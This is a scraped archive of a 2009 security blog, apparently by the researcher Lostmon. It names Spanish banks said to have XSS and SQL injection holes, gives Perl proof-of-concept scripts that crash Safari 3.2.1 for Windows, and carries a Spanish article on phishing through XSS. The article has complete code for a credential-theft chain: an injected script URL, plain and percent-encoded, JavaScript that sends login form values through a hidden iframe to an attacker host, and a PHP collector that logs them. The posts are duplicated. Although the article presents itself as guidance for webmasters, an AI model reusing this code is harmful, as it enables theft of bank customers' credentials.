como se empeñan en mostrarnos en sellos y sellos de calidad
y garantia.
Casi todos suelen escudarse en que por falta de tiempo se
sacan a produccion partes o proyectos que no han sido aun
bien probados o testeados a fondo....
No deberian Antes de hacer eso , testear y retestear , para
no poner en peligro otras partes dela web?.
No revelo las vulnerabilidades por motivos obvios
aunque si podeis ver unas capturas como prueba del
concepto(he borrado la informacion destacada de las URL)
y dire que pero entre ellas se haya una muy grave la cual
la entidad afetada deberia correjir cuanto antes;
pues permite la inclusion de todo un sitio web
bajo un frame en su dominio, las demas son agujeros
xss y sql injection , asi como algun escape de
informacion suficiente para lanzar un aatque de tipo
ingenieria social.
Me dejo dos en el tintero que son las que parecen
dispuestas aparchear y merecen su tiempo para ello
al menos por el interes prestado.
Las entidades afectadas son :
##############
servicaixa
##############
http://www.servicaixa.com
###########
sa nostra
###########
www.sanostra.es
###############
caixa sabadell
###############
http://www.caixasabadell.com
Esta entidad Ya ha solucionado Sus Dos
agujeros y vuelve a ser segura en esos puntos.
##################
caixa manresa
##############
http://www.caixamanresa.es
###########
caja duero
###########
https://www.cajaduero.es
###########
cajasol
###########
http://www.cajasol.es
##############
deutsche-bank
###############
http://www.deutsche-bank.es
#####################
kutxa.net
####################
http://www.kutxa.net
se les notifico un agujero xss
concretamente un XSS persistente
y este ha sido ya pacheado.
###########
Banesto
############
http://www.banesto.es
###################
banco santander:
###################
https://www.bancosantander.es
###########
cajastur
###########
http://www.cajastur.es
################€nd###################
--
atentamente:
Lostmon (Lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group:http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Safari 3.2.1 for windows SafariURL protocol Handler abusse(null Deference)
Saturday, January 31, 2009
##############################################
Safari 3.2.1 for windows safariUrl protocol Handler abusse(null Deference)
Vendor:http://www.apple.com
original advisore:http://lostmon.blogspot.com/2009/01/
safari-321-for-windows-safariurl.html
vendor notify:YES Exploit available: Private
##############################################
This article is a "second" part of :
http://lostmon.blogspot.com/2009/01/safari-for-windows-321-remote-http-uri.html
Safari for windows in prone vulnerable to a null pointer deference
in protocols handlers http, ftp and SafariURL.
The issue is triggered when a user in click a specially crafted link
with malformed uri that causess a NULL pointer derefence safari,
and will result in loss of availability for the browser.
In the case of SafariURL is very curious, because we can compose
a malformed url like SafariIRL://../ or SafariURL://http://../ or
ftp://../ and wen try to open it whith safari,safari opens a new
windows , and wen we try to close this new one,clicking in the
'X' the window is closed, but it reopens again ...
sO why it opens again in a infinite loop?
Take a look of posible source code of the fucnction.
in any place of the code before using a pointer,
it check that it is not equal to NULL:
######################
Part of code affected
######################
CFURLRef safariURL = nil;
OSStatus err = LSFindApplicationForInfo(kLSUnknownCreator, CFSTR("com.apple.Safari"), nil, nil, &safariURL);if (err != noErr)
displayErrorAndQuit(@"Unable to locate Safari", @"Nightly builds of WebKit require Safari to run. Please check that it is available and then try again.");
NSBundle *safariBundle = [NSBundle bundleWithPath:[(NSURL *)safariURL path]];
CFRelease(safariURL);
return safariBundle; }
###############################
Simple PoC
I don´t know if it has remote code execution, or other
i make SEVERAL test and only can cause a DoS ,
i don´t know if we can change NSBundle...
this issue with SafariURL can exploit across other browsers.
wen open the link with other browsers it executes safari.exe -url [link]
Thnx To estrella to be my ligth
Thnx to all Lostmon Team.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Safari 3.2.1 for windows safariUrl protocol Handler abusse(null Deference)
Vendor:http://www.apple.com
original advisore:http://lostmon.blogspot.com/2009/01/
safari-321-for-windows-safariurl.html
vendor notify:YES Exploit available: Private
##############################################
This article is a "second" part of :
http://lostmon.blogspot.com/2009/01/safari-for-windows-321-remote-http-uri.html
Safari for windows in prone vulnerable to a null pointer deference
in protocols handlers http, ftp and SafariURL.
The issue is triggered when a user in click a specially crafted link
with malformed uri that causess a NULL pointer derefence safari,
and will result in loss of availability for the browser.
In the case of SafariURL is very curious, because we can compose
a malformed url like SafariIRL://../ or SafariURL://http://../ or
ftp://../ and wen try to open it whith safari,safari opens a new
windows , and wen we try to close this new one,clicking in the
'X' the window is closed, but it reopens again ...
sO why it opens again in a infinite loop?
Take a look of posible source code of the fucnction.
in any place of the code before using a pointer,
it check that it is not equal to NULL:
######################
Part of code affected
######################
CFURLRef safariURL = nil;
OSStatus err = LSFindApplicationForInfo(kLSUnknownCreator, CFSTR("com.apple.Safari"), nil, nil, &safariURL);if (err != noErr)
displayErrorAndQuit(@"Unable to locate Safari", @"Nightly builds of WebKit require Safari to run. Please check that it is available and then try again.");
NSBundle *safariBundle = [NSBundle bundleWithPath:[(NSURL *)safariURL path]];
CFRelease(safariURL);
return safariBundle; }
###############################
Simple PoC
################################################
# !/usr/bin/perl
# Safari_httpDoSPoc.pl
# Safari for Windows 3.2.1 Remote http: uri handler DoS
# Lostmon [Lostmon@gmail.com ]
#[http://lostmon.blogspot.com]
$archivo = $ARGV[0];
if(!defined($archivo))
{
print "Uso: $0 <archivo.html>\n";
}
$cabecera = "<html><Title> Safari 3.2.1 for windows Browser Die PoC By Lostmon</title>
<body>" . "\n";
$codigo = "<h3>Safari 3.2.1 for windows Browser Die PoC By Lostmon <br>(lostmon@gmail.com) http://lostmon.blogspot.com</h3>
<P>This PoC is a malformed http ,safariurl and ftp URI, this causes that safari for windows<br>
turn inestable and unresponsive.<br>
Click THIS link.=></p><a href=\"SafariURL://http://../\">Safari Die()</a> or this other =><a href=\SafariURL://"http://./\">Safari Die()</a>
<br>
=></p><a href=\"SafariURL://ftp://../\">Safari Die()</a> or this other =><a href=\SafariURL://"ftp://./\">Safari Die()</a>
";
$piepag = "</body></html>";
$datos = $cabecera . $codigo . $piepag;
open(FILE, '>' . $archivo);
print FILE $datos;
close(FILE);
exit;
############################################
I don´t know if it has remote code execution, or other
i make SEVERAL test and only can cause a DoS ,
i don´t know if we can change NSBundle...
this issue with SafariURL can exploit across other browsers.
wen open the link with other browsers it executes safari.exe -url [link]
Thnx To estrella to be my ligth
Thnx to all Lostmon Team.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Safari for Windows 3.2.1 Remote http: URI handler DoS
Tuesday, January 27, 2009
A "malformed" http domain name , can cause that safari turn in
a infinite loop wen try to resolve this domain, and it can cause
at memory level a access violation wen try to write a secction
that contains unknow data.
See Safari_httpDoSPoc.pl file to demostrate it !
AppName: safari.exe AppVer: 3.525.27.1 ModName: safari.exe
ModVer: 3.525.27.1 Offset: 00089394
Thnx To estrella to be my ligth
Thnx to all who belive in me...
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
a infinite loop wen try to resolve this domain, and it can cause
at memory level a access violation wen try to write a secction
that contains unknow data.
See Safari_httpDoSPoc.pl file to demostrate it !
AppName: safari.exe AppVer: 3.525.27.1 ModName: safari.exe
ModVer: 3.525.27.1 Offset: 00089394
################################################
# !/usr/bin/perl
# Safari_httpDoSPoc.pl
# Safari for Windows 3.2.1 Remote http: uri handler DoS
# Lostmon [Lostmon@gmail.com ]
#[http://lostmon.blogspot.com]
$archivo = $ARGV[0];
if(!defined($archivo))
{
print "Uso: $0 <archivo.html>\n";
}
$cabecera = "<html><Title> Safari 3.2.1 for windows Browser Die PoC By Lostmon</title>
<body>" . "\n";
$codigo = "<h3>Safari 3.2.1 for windows Browser Die PoC By Lostmon <br>(lostmon@gmail.com) http://lostmon.blogspot.com</h3>
<P>This PoC is a malformed http URI, this causes that safari for windows<br>
turn inestable and unresponsive.<br>
Click THIS link.=></p><a href=\"http://../\">Safari Die()</a> or this other =><a href=\"http://./\">Safari Die()</a>
";
$piepag = "</body></html>";
$datos = $cabecera . $codigo . $piepag;
open(FILE, '>' . $archivo);
print FILE $datos;
close(FILE);
exit;
############################################
Thnx To estrella to be my ligth
Thnx to all who belive in me...
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
La banca española ante el phishing
Tuesday, January 06, 2009
##########################################
La banca española ante el phishing
##########################################
Despues del aumento reciente de los casos de phishing sobre
entidades Bancarias españolas,he realizado un pequeño estudio
sobre el estado de esas entidades, de cara al phishing.
Entendemos por phishing , el envio de correos fraudulentos
suplantando la identidad de una entidad bancaria, en el cual se
nos avisa de algun fallo de seguridad u otra informacion, y se
nos insta a visitar una url falsa de la entidad (normalmente
camuflan la direccion real),y una vez visitada, se nos pedira
seguramente , nuestras credenciales para acceder,y de hacerlo,
normalmente esas webs estan preparadas para capturar nuestros
datos de acceso.
Todo esto esta bastante bien explicado aqui :
http://www.microsoft.com/latam/seguridad/hogar/spam/phishing.mspx
Una vez entendido el concepto de phishing, podemos pensar,que
hay que ser muy tonto, para visitar una web que no es la original
del banco y meter , nuestras credenciales.
Normalmente es asi , pero que ocurre si esa url desde donde se
lleva a cabo el ataque de phishing es realmente la original del banco?
En una mirada asi por encima se han detectado once entidades
españolas tanto cajas como bancos afectados.
Si desea saber si su entidad esta afectada, mandeme un mail
y gustosamente le informaremos de si esta usted en el listado
y de estar en el , le serian reportadas las vulnerabilidades
encontradas y su posible solucion o mitigacion.
De todas maneras todas las entidades afectadas,recibiran un mail
avisandoles de esta situacion( a algunas ya se le ha enviado).
Pero esto es irse por las ramas y no destapar el meollo de la
cuestion.. XDDDD
Asi pues si ponemos por caso que la mayoria de web corporativas
de entidades bancarias y financieras son vulnerables a ataques de
tipo XSS o CSRF(links a la wiki), esto aumenta la posibilidad de
realizar ataques de phishing sobre la misma web del banco y hacer
asi mas creibles para los usuarios incautos el engaño.
Como puede un atacante que haya encontrado un agujero de ese
tipo llevar a cabo con exito ese ataque?
Lo expuesto acontinuacion esta escrito a titulo de muestra o
ejemplo no me hago responsable del uso que le puedan dar
usuarios malintencionados.
Esto esta mas bien expuesto como ejemplo para administradores
y webmasters a titulo explicativo de como un atacante puede
realizar este tipo de ataques sobre la misma web y hacer asi
mas creible el engaño.
Un server (seguramente comprometido) para recojer los datos y
hostear los archivos necesarios para el phishing (javascripts).
Algun servidor SMTP con el relay abierto y sin autentificacion
Por si queremos hacer uso de funciones de mail()
En un banco, en la web de autentificacion , normalmente
encontramos un formulario en el cual se nos piden los datos
para poder acceder al manejo de cuentas y demas.
Un ejemplo de formulario podria ser similar a este:
====================
====================
[..]
<form method="POST" action="login.php" name="loginusuarios">
User: <input type="text" name="usuari"><br />
Pass: <input type="password" name="pass"><br />
<input type="submit" name="submit" value="Login">
</form>
[..]
<!-- EOF -->
si observamos el codigo vemos varios elementos:
- Hay un formulario de acceso llamado "loginusuarios"
- El usuario de texto será "loginusuarios.usuari"
- El paso de texto será "loginusuarios.pass"
Por lo tanto,podriamos crear un java a medida para el sitio
para que añadiera un iframe oculto al cuerpo del documento por
medio de xss y obtener asi los datos introducidos.
Un ejemplo podria ser este:
http://[Entidad_victima]/login.php?variable_vulnerable=
"><script src="http://[Attacker]/phishing.js"></script>
o en alguna de sus codificaciones para disimularlo aun mas:
http://[Entidad Victima]/login.php?variable_vulnerable=%22%3E
%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%
5B%41%74%74%61%63%6B%65%72%5D%2F%70%68%69%73%68%69%6E%67%2E%
6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E
El javascript, se ejecutaria en el contexto de seguridad entre
el server, y el navegador del usuario lejitimo de la web.
====================
/* phishing.js */
===================
//Ponemos el nombre del formulario
Form = document.forms["loginusuarios"];
function OcultarLogin() {
// Creamos un nuevo iframe.
var iframe = document.createElement("iframe");
// Forzamos al iframe a que este escondido
iframe.style.display = "none";
// Cargamos el codigo malicioso en el iframe.
iframe.src = "http://[atacante]/pilla_login.php?user="
+ Form.usuari.value + "&pass=" + Form.pass.value;
// Añadimos el iframe en el cuerpo del documento
document.body.appendChild(iframe);
}
// Cuando el usuario clica en enviar, se nos envia esa inf.
Form.onsubmit = OcultarLogin();
/* EOF */
==========================
Despues necesitamos que esos datos sean recojidos, y para
ello necesitaremos un server donde llevar los POST y un
archivo hosteado preparado para recibirlos y guardarlos o
enviarlos por mail ,como queramos.
====================
/* pilla_login.php */
====================
if(isset($_GET['user']) && isset($_GET['pass'])) {
// Establece el path y abre el archivo logins.txt
$file_path = "logins.txt";
$file = @fopen($file_path, "a");
// genera la cadena
$string = "User: ". $_GET['user'] ." and Pass: ". $_GET['pass'] . "\n";
// Escribe la cadena y cierra el archivo.
@fwrite($file, $string);
@fclose($file);
}
// si ademas queremos enviar los datos capturados por mail =>
// mail("atacante@atacante.es","Otro Pardillo pico","$string");
?>
/* EOF */
=================================
Con lo cual un agujero bien simple como puede ser un
XSS puede convertirse en un ataque sofisticado para
realizar un phishing directo a una entidad Bancaria.
Aun podriamos rizar mas el rizo:
Suponiendo que el usuario victima ,no visite la web, o que
cliquee en otro lado y vaya a otra pagina diferente de donde
se encuentra el formulario de login,podriamos "forzarlo" a
ir a la pagina delogin primero,y antes de que realice ninguna
accion, deba introducir primero los datos de login , para
poder acceder.
Esto seria tambien aun mas creible ya que estariamos efectuando
el phishing directamente desde la web de la entidad y ademas
obligamos al user a hacer login con su propio formulario
de login.
Si modificamos el javascript anterior para que haga lo mismo;
pero que ademas fuerce al usuario,creariamos un segundo iframe.
en un iframe cargaremos el codigo malicioso , y en el otro
cargariamos el formulario de login de la web:
=================================
/* phishing2.js */
Form = document.forms["loginusuarios"];
function forzarLogin() {
var loginiframe = document.createElement("iframe");
var loginiframe.src = "http://[Entidad-victima]/login.php";
document.body.appendChild(loginiframe);
}
function OcultarLogin() {
var iframe = document.createElement("iframe");
iframe.style.display = "none";
iframe.src = "http://[Atacante]/pilla_login.php?user="
+ Form.usuari.value + "&pass=" + Form.pass.value;
document.body.appendChild(iframe);
}
window.onload = forzarLogin();
Form.onsubmit = OcultarLogin();
/* EOF */
====================================
Aunque todo lo aqui expuesto es un burdo ejemplo,creo que
queda bien reflejado el alcance y que el resultado, es obvio,
aunque en muchos contratos de banca online , se "firma" que
el usuario no hara un mal uso de las credenciales suministradas
...etc.
Ante un ataque real de phishing...el usuario victima,ni se
habra enterado de lo que ha pasado , ya que en si ha sido
el el que legalmente ha introducido sus credenciales en la
web de la entidad y ha sido desde la web misma de la entidad
desde donde han sido robadas esas claves.
Seguramente los webmasters y programadores de los sitios web
de estas caracteristicas, deberian fijarse mas en este tipo
de agujeros a los cuales no se les da mucha importancia.
Muchas veces , Contratan servicios o sistemas ya prediseñados
como pueden ser alguno de los portales de oracle o algun tipo
de CMS como Vignette CMS;Pero ¿No son resposables los equipos
de seguridad logica que poseen las entidades o que subcontratan?
No deberian esos equipos estar al dia en vulnerabilidades sobre
sus sistemas??
La primera medida para poder luchar contra la plaga que
es el phishing deberia ser mantener nuestros sitios libres
de agujeros o al menos revisarlos y no sacar al mercado ,
nada que no haya sido antees testeado a fondo, Pues es
nuestro dinero con el que en se juega.
Despues de este estudio, dire, que me he quedado muy
decepcionado de lo que es la banca online española,
actualmente, son bastantes las entidades que podrian
estar afectadas.
Los usuarios podrian prevenir estas situaciones usando por
ejemplo Internet explorer 8 que lleva un filtro antiXSS,
aunque personalmente me fio mas de la barra de netcraft,
ademas de que puede ser usada en explorer y en firefox
http://toolbar.netcraft.com/
###############################
Enlaces Relacionados y fuentes:
###############################
http://www.siliconnews.es/es/news/2008/09/22/bancos_espanoles_victimas_5_phishing_mundial
http://www.antiphishing.org
http://www.playhack.net/papers/
http://www.microsoft.com/spain/empresas/legal/phishing.mspx
http://www.microsoft.com/latam/seguridad/hogar/spam/phishing.mspx
http://seguridad.internautas.org/html/4428.html
--
atentamente:
Lostmon (Lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group:http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
La banca española ante el phishing
##########################################
Despues del aumento reciente de los casos de phishing sobre
entidades Bancarias españolas,he realizado un pequeño estudio
sobre el estado de esas entidades, de cara al phishing.
Entendemos por phishing , el envio de correos fraudulentos
suplantando la identidad de una entidad bancaria, en el cual se
nos avisa de algun fallo de seguridad u otra informacion, y se
nos insta a visitar una url falsa de la entidad (normalmente
camuflan la direccion real),y una vez visitada, se nos pedira
seguramente , nuestras credenciales para acceder,y de hacerlo,
normalmente esas webs estan preparadas para capturar nuestros
datos de acceso.
Todo esto esta bastante bien explicado aqui :
http://www.microsoft.com/latam/seguridad/hogar/spam/phishing.mspx
Una vez entendido el concepto de phishing, podemos pensar,que
hay que ser muy tonto, para visitar una web que no es la original
del banco y meter , nuestras credenciales.
Normalmente es asi , pero que ocurre si esa url desde donde se
lleva a cabo el ataque de phishing es realmente la original del banco?
En una mirada asi por encima se han detectado once entidades
españolas tanto cajas como bancos afectados.
Si desea saber si su entidad esta afectada, mandeme un mail
y gustosamente le informaremos de si esta usted en el listado
y de estar en el , le serian reportadas las vulnerabilidades
encontradas y su posible solucion o mitigacion.
De todas maneras todas las entidades afectadas,recibiran un mail
avisandoles de esta situacion( a algunas ya se le ha enviado).
Pero esto es irse por las ramas y no destapar el meollo de la
cuestion.. XDDDD
Asi pues si ponemos por caso que la mayoria de web corporativas
de entidades bancarias y financieras son vulnerables a ataques de
tipo XSS o CSRF(links a la wiki), esto aumenta la posibilidad de
realizar ataques de phishing sobre la misma web del banco y hacer
asi mas creibles para los usuarios incautos el engaño.
Como puede un atacante que haya encontrado un agujero de ese
tipo llevar a cabo con exito ese ataque?
Lo expuesto acontinuacion esta escrito a titulo de muestra o
ejemplo no me hago responsable del uso que le puedan dar
usuarios malintencionados.
Esto esta mas bien expuesto como ejemplo para administradores
y webmasters a titulo explicativo de como un atacante puede
realizar este tipo de ataques sobre la misma web y hacer asi
mas creible el engaño.
Un server (seguramente comprometido) para recojer los datos y
hostear los archivos necesarios para el phishing (javascripts).
Algun servidor SMTP con el relay abierto y sin autentificacion
Por si queremos hacer uso de funciones de mail()
En un banco, en la web de autentificacion , normalmente
encontramos un formulario en el cual se nos piden los datos
para poder acceder al manejo de cuentas y demas.
Un ejemplo de formulario podria ser similar a este:
====================
====================
[..]
<form method="POST" action="login.php" name="loginusuarios">
User: <input type="text" name="usuari"><br />
Pass: <input type="password" name="pass"><br />
<input type="submit" name="submit" value="Login">
</form>
[..]
<!-- EOF -->
si observamos el codigo vemos varios elementos:
- Hay un formulario de acceso llamado "loginusuarios"
- El usuario de texto será "loginusuarios.usuari"
- El paso de texto será "loginusuarios.pass"
Por lo tanto,podriamos crear un java a medida para el sitio
para que añadiera un iframe oculto al cuerpo del documento por
medio de xss y obtener asi los datos introducidos.
Un ejemplo podria ser este:
http://[Entidad_victima]/login.php?variable_vulnerable=
"><script src="http://[Attacker]/phishing.js"></script>
o en alguna de sus codificaciones para disimularlo aun mas:
http://[Entidad Victima]/login.php?variable_vulnerable=%22%3E
%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%
5B%41%74%74%61%63%6B%65%72%5D%2F%70%68%69%73%68%69%6E%67%2E%
6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E
El javascript, se ejecutaria en el contexto de seguridad entre
el server, y el navegador del usuario lejitimo de la web.
====================
/* phishing.js */
===================
//Ponemos el nombre del formulario
Form = document.forms["loginusuarios"];
function OcultarLogin() {
// Creamos un nuevo iframe.
var iframe = document.createElement("iframe");
// Forzamos al iframe a que este escondido
iframe.style.display = "none";
// Cargamos el codigo malicioso en el iframe.
iframe.src = "http://[atacante]/pilla_login.php?user="
+ Form.usuari.value + "&pass=" + Form.pass.value;
// Añadimos el iframe en el cuerpo del documento
document.body.appendChild(iframe);
}
// Cuando el usuario clica en enviar, se nos envia esa inf.
Form.onsubmit = OcultarLogin();
/* EOF */
==========================
Despues necesitamos que esos datos sean recojidos, y para
ello necesitaremos un server donde llevar los POST y un
archivo hosteado preparado para recibirlos y guardarlos o
enviarlos por mail ,como queramos.
====================
/* pilla_login.php */
====================
if(isset($_GET['user']) && isset($_GET['pass'])) {
// Establece el path y abre el archivo logins.txt
$file_path = "logins.txt";
$file = @fopen($file_path, "a");
// genera la cadena
$string = "User: ". $_GET['user'] ." and Pass: ". $_GET['pass'] . "\n";
// Escribe la cadena y cierra el archivo.
@fwrite($file, $string);
@fclose($file);
}
// si ademas queremos enviar los datos capturados por mail =>
// mail("atacante@atacante.es","Otro Pardillo pico","$string");
?>
/* EOF */
=================================
Con lo cual un agujero bien simple como puede ser un
XSS puede convertirse en un ataque sofisticado para
realizar un phishing directo a una entidad Bancaria.
Aun podriamos rizar mas el rizo:
Suponiendo que el usuario victima ,no visite la web, o que
cliquee en otro lado y vaya a otra pagina diferente de donde
se encuentra el formulario de login,podriamos "forzarlo" a
ir a la pagina delogin primero,y antes de que realice ninguna
accion, deba introducir primero los datos de login , para
poder acceder.
Esto seria tambien aun mas creible ya que estariamos efectuando
el phishing directamente desde la web de la entidad y ademas
obligamos al user a hacer login con su propio formulario
de login.
Si modificamos el javascript anterior para que haga lo mismo;
pero que ademas fuerce al usuario,creariamos un segundo iframe.
en un iframe cargaremos el codigo malicioso , y en el otro
cargariamos el formulario de login de la web:
=================================
/* phishing2.js */
Form = document.forms["loginusuarios"];
function forzarLogin() {
var loginiframe = document.createElement("iframe");
var loginiframe.src = "http://[Entidad-victima]/login.php";
document.body.appendChild(loginiframe);
}
function OcultarLogin() {
var iframe = document.createElement("iframe");
iframe.style.display = "none";
iframe.src = "http://[Atacante]/pilla_login.php?user="
+ Form.usuari.value + "&pass=" + Form.pass.value;
document.body.appendChild(iframe);
}
window.onload = forzarLogin();
Form.onsubmit = OcultarLogin();
/* EOF */
====================================
Aunque todo lo aqui expuesto es un burdo ejemplo,creo que
queda bien reflejado el alcance y que el resultado, es obvio,
aunque en muchos contratos de banca online , se "firma" que
el usuario no hara un mal uso de las credenciales suministradas
...etc.
Ante un ataque real de phishing...el usuario victima,ni se
habra enterado de lo que ha pasado , ya que en si ha sido
el el que legalmente ha introducido sus credenciales en la
web de la entidad y ha sido desde la web misma de la entidad
desde donde han sido robadas esas claves.
Seguramente los webmasters y programadores de los sitios web
de estas caracteristicas, deberian fijarse mas en este tipo
de agujeros a los cuales no se les da mucha importancia.
Muchas veces , Contratan servicios o sistemas ya prediseñados
como pueden ser alguno de los portales de oracle o algun tipo
de CMS como Vignette CMS;Pero ¿No son resposables los equipos
de seguridad logica que poseen las entidades o que subcontratan?
No deberian esos equipos estar al dia en vulnerabilidades sobre
sus sistemas??
La primera medida para poder luchar contra la plaga que
es el phishing deberia ser mantener nuestros sitios libres
de agujeros o al menos revisarlos y no sacar al mercado ,
nada que no haya sido antees testeado a fondo, Pues es
nuestro dinero con el que en se juega.
Despues de este estudio, dire, que me he quedado muy
decepcionado de lo que es la banca online española,
actualmente, son bastantes las entidades que podrian
estar afectadas.
Los usuarios podrian prevenir estas situaciones usando por
ejemplo Internet explorer 8 que lleva un filtro antiXSS,
aunque personalmente me fio mas de la barra de netcraft,
ademas de que puede ser usada en explorer y en firefox
http://toolbar.netcraft.com/
###############################
Enlaces Relacionados y fuentes:
###############################
http://www.siliconnews.es/es/news/2008/09/22/bancos_espanoles_victimas_5_phishing_mundial
http://www.antiphishing.org
http://www.playhack.net/papers/
http://www.microsoft.com/spain/empresas/legal/phishing.mspx
http://www.microsoft.com/latam/seguridad/hogar/spam/phishing.mspx
http://seguridad.internautas.org/html/4428.html
--
atentamente:
Lostmon (Lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group:http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)